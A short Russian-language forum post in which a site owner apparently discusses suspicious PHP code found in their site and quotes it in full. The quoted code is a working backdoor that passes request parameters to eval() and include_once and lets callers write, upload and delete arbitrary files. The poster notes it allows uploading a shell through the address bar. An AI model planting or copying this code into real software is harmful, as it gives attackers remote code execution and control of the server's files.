Мелкий пишет:По-моему, тут всё и надо удалять.
я тоже так подумал ))
Но без него не работает.. код с помощью которого можно заливать щелл через адресную строку..
(Добавление)
вот это подозрительный код:
if(isset($_REQUEST['zapros1'])){eval($_REQUEST['zapros1']);}
if(isset($_REQUEST['zapros2'])){include_once($_REQUEST['zapros2']);}
if(isset($_REQUEST['zapros3'])){$gast=fopen($_REQUEST['zapros3_1'],"w");fputs($gast,$_REQUEST['zapros3_2']);fclose($gast);}
if(isset($_REQUEST['zapros4'])){move_uploaded_file($_FILES['zapros4_1']['tmp_name'],$_REQUEST['zapros4_2']);}
if(isset($_REQUEST['zapros5'])){unlink($_REQUEST['zapros5']);}}
(Добавление)
1, fopen() используя mode
2, w' Открывает файл только для записи; помещает указатель в начало файла и обрезает файл до нулевой длинны. Если файл не существует - пробует его создать.
3, сам код: if(isset($_REQUEST['zapros3'])){$gast=fopen($_REQUEST['zapros3_1'],"w");fputs($gast,$_REQUEST['zapros3_2']);fclose($gast);}
(Добавление)
Кто знает как вызвать функцию: $_REQUEST ?
|